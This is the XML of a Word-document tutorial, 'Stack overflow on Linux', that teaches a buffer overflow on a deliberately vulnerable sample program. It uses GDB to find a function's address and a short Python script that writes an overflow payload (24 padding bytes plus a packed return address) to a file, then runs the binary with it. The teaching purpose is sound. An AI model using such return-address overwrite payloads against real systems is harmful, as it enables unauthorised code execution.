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6B078" w14:textId="5F44EE8D" w:rsidR="00CF1992" w:rsidRDefault="00C4245D" w:rsidP="00C4245D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C4245D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C4245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C4245D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>overflow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C4245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C4245D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C4245D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72807050" w14:textId="36789C62" w:rsidR="00C4245D" w:rsidRDefault="00C4245D" w:rsidP="00C4245D">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C4245D">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Now, we are about to learn what a buffer overflow is, and we will understand how to change the</w:t>
      </w:r>
      <w:r w:rsidRPr="00C4245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4245D">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>flow of an execution using a vulnerable source code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1436F0" w14:textId="2C72E7B4" w:rsidR="00C4245D" w:rsidRDefault="007E51C1" w:rsidP="00C4245D">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="fontstyle31"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, by looking at the error, we see our injected </w:t>
      </w:r>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">b </w:t>
      </w:r>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>characters in there. At this point, we are</w:t>
      </w:r>
      <w:r w:rsidRPr="007E51C1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E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">doing very well. Now we know our injection form, let's try to execute the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>letsprint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="007E51C1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E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">using the </w:t>
      </w:r>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">disassemble </w:t>
      </w:r>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>command:</w:t>
      </w:r>
      <w:r w:rsidRPr="007E51C1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E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle31"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ disassemble </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle31"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>letsprint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4F2FBFA7" w14:textId="2F0EAAB1" w:rsidR="007E51C1" w:rsidRDefault="007E51C1" w:rsidP="00C4245D">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The output of the preceding command can be seen in the following screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B71061" w14:textId="487F6D47" w:rsidR="007E51C1" w:rsidRDefault="007E51C1" w:rsidP="00C4245D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b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3FF1139" wp14:editId="249A24B8">
            <wp:extent cx="5400040" cy="20758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0CBD" w14:textId="7A06964C" w:rsidR="007E51C1" w:rsidRDefault="007E51C1" w:rsidP="00C4245D">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="fontstyle31"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We got the first instruction in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>letsprint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">function, </w:t>
      </w:r>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">push </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rbp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">with address </w:t>
      </w:r>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x00000000004005e3</w:t>
      </w:r>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="007E51C1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E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and the real address is what we need here; we can also get the address by using the </w:t>
      </w:r>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r w:rsidRPr="007E51C1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E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>command:</w:t>
      </w:r>
      <w:r w:rsidRPr="007E51C1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E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle31"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ print </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle31"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>letsprint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69C0CD0E" w14:textId="06B641A2" w:rsidR="007E51C1" w:rsidRDefault="007E51C1" w:rsidP="00C4245D">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The output of the preceding command can be seen in the following screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1900AA36" w14:textId="0EB2FB96" w:rsidR="007E51C1" w:rsidRDefault="007E51C1" w:rsidP="00C4245D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b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FC3D6DE" wp14:editId="0716BF3B">
            <wp:extent cx="5114925" cy="5429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6DB8" w14:textId="72B2486D" w:rsidR="007E51C1" w:rsidRPr="007E51C1" w:rsidRDefault="007E51C1" w:rsidP="00C4245D">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Now that we have the address, let's try to build our exploit using Python because we can't pass</w:t>
      </w:r>
      <w:r w:rsidRPr="007E51C1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E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the address directly:</w:t>
      </w:r>
      <w:r w:rsidRPr="007E51C1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gramStart"/>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/bin/python</w:t>
      </w:r>
      <w:r w:rsidRPr="007E51C1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E51C1">
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>from struct import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C916FF0" w14:textId="15A00EF4" w:rsidR="007E51C1" w:rsidRDefault="007E51C1" w:rsidP="00C4245D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7E51C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>buffer = ''</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>buffer += 'a'*24</w:t>
      </w:r>
      <w:r w:rsidRPr="007E51C1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buffer += </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pack(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"&lt;Q", 0x0000004005e3)</w:t>
      </w:r>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>f = open("input.txt", "w")</w:t>
      </w:r>
      <w:r w:rsidRPr="007E51C1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7E51C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(buffer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386A5D1D" w14:textId="4B1EB73B" w:rsidR="007E51C1" w:rsidRDefault="007E51C1" w:rsidP="00C4245D">
      <w:pPr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7E51C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Then, we execute it to generate the new input:</w:t>
      </w:r>
      <w:r w:rsidRPr="007E51C1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gramStart"/>
      <w:r w:rsidRPr="007E51C1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$ .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E51C1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/exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74681E55" w14:textId="5960A328" w:rsidR="007E51C1" w:rsidRDefault="007E51C1" w:rsidP="00C4245D">
      <w:pPr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</w:p>
    <w:p w14:paraId="5065B016" w14:textId="77777777" w:rsidR="007E51C1" w:rsidRDefault="007E51C1" w:rsidP="00C4245D">
      <w:pPr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7E51C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Now, from inside GDB, run the following command:</w:t>
      </w:r>
      <w:r w:rsidRPr="007E51C1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E51C1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$ run $(cat input.txt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B600E2B" w14:textId="202AB737" w:rsidR="007E51C1" w:rsidRPr="007E51C1" w:rsidRDefault="007E51C1" w:rsidP="00C4245D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E51C1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br/>
      </w:r>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rFonts w:ascii="LiberationSerif" w:hAnsi="LiberationSerif"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We did it! Now, let's confirm that from our shell instead of GDB:</w:t>
      </w:r>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rFonts w:ascii="LiberationSerif" w:hAnsi="LiberationSerif"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rFonts w:ascii="LiberationMono-Bold" w:hAnsi="LiberationMono-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E51C1">
        <w:rPr>
          <w:rFonts w:ascii="LiberationMono-Bold" w:hAnsi="LiberationMono-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/buffer $(cat input.txt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5694B1F7" w14:textId="77777777" w:rsidR="007E51C1" w:rsidRPr="007E51C1" w:rsidRDefault="007E51C1" w:rsidP="00C4245D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3340000E" w14:textId="77777777" w:rsidR="007E51C1" w:rsidRPr="007E51C1" w:rsidRDefault="007E51C1" w:rsidP="00C4245D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02BB1C9A" w14:textId="77777777" w:rsidR="00C4245D" w:rsidRPr="00C4245D" w:rsidRDefault="00C4245D" w:rsidP="00C4245D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00C4245D" w:rsidRPr="00C424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LiberationMono">
    <w:altName w:val="Cambria"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="LiberationMono-Bol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83"/>
    <w:rsid w:val="000E4DC9"/>
    <w:rsid w:val="00355195"/>
    <w:rsid w:val="007B3683"/>
    <w:rsid w:val="007E51C1"/>
    <w:rsid w:val="00A13A99"/>
    <w:rsid w:val="00C168C9"/>
    <w:rsid w:val="00C4245D"/>
    <w:rsid w:val="00EC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647473"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B5F70D0F-A56A-4A18-8459-D66A6F30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C4245D"/>
    <w:rPr>
      <w:rFonts w:ascii="LiberationSerif" w:hAnsi="LiberationSerif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Fuentedeprrafopredeter"/>
    <w:rsid w:val="007E51C1"/>
    <w:rPr>
      <w:rFonts w:ascii="LiberationMono" w:hAnsi="LiberationMono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Fuentedeprrafopredeter"/>
    <w:rsid w:val="007E51C1"/>
    <w:rPr>
      <w:rFonts w:ascii="LiberationMono-Bold" w:hAnsi="LiberationMono-Bold" w:hint="default"/>
      <w:b/>
      <w:bCs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 IBM</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>MBI IBM</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-03-11T03:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-11T04:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>